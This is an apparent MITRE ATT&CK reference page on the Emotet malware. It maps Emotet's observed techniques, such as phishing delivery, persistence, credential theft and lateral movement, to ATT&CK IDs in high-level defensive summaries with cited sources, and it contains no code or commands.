Skip to content

S0367 Emotet

Emotet is a modular malware variant which is primarily used as a downloader for other malware variants such as TrickBot and IcedID. Emotet first emerged in June 2014 and has been primarily used to target the banking sector. 8

Item Value
ID S0367
Associated Names Geodo
Type MALWARE
Version 1.4
Created 25 March 2019
Last Modified 17 January 2023
Navigation Layer View In ATT&CK® Navigator

Associated Software Descriptions

Name Description
Geodo 12

Techniques Used

Domain ID Name Use
enterprise T1087 Account Discovery -
enterprise T1087.003 Email Account Emotet has been observed leveraging a module that can scrape email addresses from Outlook.316
enterprise T1560 Archive Collected Data Emotet has been observed encrypting the data it collects before sending it to the C2 server. 14
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder Emotet has been observed adding the downloaded payload to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key to maintain persistence.11137
enterprise T1110 Brute Force -
enterprise T1110.001 Password Guessing Emotet has been observed using a hard coded list of passwords to brute force user accounts. 10111363
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz. 11127415
enterprise T1059.003 Windows Command Shell Emotet has used cmd.exe to run a PowerShell script. 7
enterprise T1059.005 Visual Basic Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads. 11112715
enterprise T1543 Create or Modify System Process -
enterprise T1543.003 Windows Service Emotet has been observed creating new services to maintain persistence. 136
enterprise T1555 Credentials from Password Stores -
enterprise T1555.003 Credentials from Web Browsers Emotet has been observed dropping browser password grabber modules. 1216
enterprise T1114 Email Collection -
enterprise T1114.001 Local Email Collection Emotet has been observed leveraging a module that scrapes email data from Outlook.3
enterprise T1573 Encrypted Channel -
enterprise T1573.002 Asymmetric Cryptography Emotet is known to use RSA keys for encrypting C2 traffic. 12
enterprise T1041 Exfiltration Over C2 Channel Emotet has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers. 12
enterprise T1210 Exploitation of Remote Services Emotet has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation. 111364
enterprise T1040 Network Sniffing Emotet has been observed to hook network APIs to monitor network traffic. 8
enterprise T1571 Non-Standard Port Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/S.1
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.002 Software Packing Emotet has used custom packers to protect its payloads.12
enterprise T1027.010 Command Obfuscation Emotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, CMD.exe arguments, and PowerShell scripts. 112717
enterprise T1003 OS Credential Dumping -
enterprise T1003.001 LSASS Memory Emotet has been observed dropping password grabber modules including Mimikatz. 12
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment Emotet has been delivered by phishing emails containing attachments. 210111311271516
enterprise T1566.002 Spearphishing Link Emotet has been delivered by phishing emails containing links. 892101113117
enterprise T1057 Process Discovery Emotet has been observed enumerating local processes.18
enterprise T1055 Process Injection -
enterprise T1055.001 Dynamic-link Library Injection Emotet has been observed injecting in to Explorer.exe and other processes. 7813
enterprise T1021 Remote Services -
enterprise T1021.002 SMB/Windows Admin Shares Emotet leverages the Admin$ share for lateral movement once the local admin password has been brute forced. 10
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task Emotet has maintained persistence through a scheduled task. 13
enterprise T1552 Unsecured Credentials -
enterprise T1552.001 Credentials In Files Emotet has been observed leveraging a module that retrieves passwords stored on a system for the current logged-on user. 133
enterprise T1204 User Execution -
enterprise T1204.001 Malicious Link Emotet has relied upon users clicking on a malicious link delivered through spearphishing.815
enterprise T1204.002 Malicious File Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.81516
enterprise T1078 Valid Accounts -
enterprise T1078.003 Local Accounts Emotet can brute force a local admin password, then use it to facilitate lateral movement.10
enterprise T1047 Windows Management Instrumentation Emotet has used WMI to execute powershell.exe.15

Groups That Use This Software

ID Name References
G0102 Wizard Spider 1920

References

  1. Brumaghin, E.. (2019, January 15). Emotet re-emerges after the holidays. Retrieved March 25, 2019. 

  2. CIS. (2017, April 28). Emotet Changes TTPs and Arrives in United States. Retrieved January 17, 2019. 

  3. CIS. (2018, December 12). MS-ISAC Security Primer- Emotet. Retrieved March 25, 2019. 

  4. Donohue, B.. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019. 

  5. ESET . (2018, November 9). Emotet launches major new spam campaign. Retrieved March 25, 2019. 

  6. Mclellan, M.. (2018, November 19). Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader. Retrieved March 25, 2019. 

  7. Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019. 

  8. Salvio, J.. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019. 

  9. Shulmin, A. . (2015, April 9). The Banking Trojan Emotet: Detailed Analysis. Retrieved March 25, 2019. 

  10. Smith, A.. (2017, December 22). Protect your network from Emotet Trojan with Malwarebytes Endpoint Security. Retrieved January 17, 2019. 

  11. Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019. 

  12. Trend Micro. (2019, January 16). Exploring Emotet’s Activities . Retrieved March 25, 2019. 

  13. US-CERT. (2018, July 20). Alert (TA18-201A) Emotet Malware. Retrieved March 25, 2019. 

  14. Xiaopeng Zhang. (2017, May 3). Deep Analysis of New Emotet Variant – Part 1. Retrieved April 1, 2019. 

  15. Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019. 

  16. Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020. 

  17. Perez, D.. (2018, December 28). Analysis of the latest Emotet propagation campaign. Retrieved April 16, 2019. 

  18. ASEC. (2017). ASEC REPORT VOL.88. Retrieved April 16, 2019. 

  19. John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020. 

  20. Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They’re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.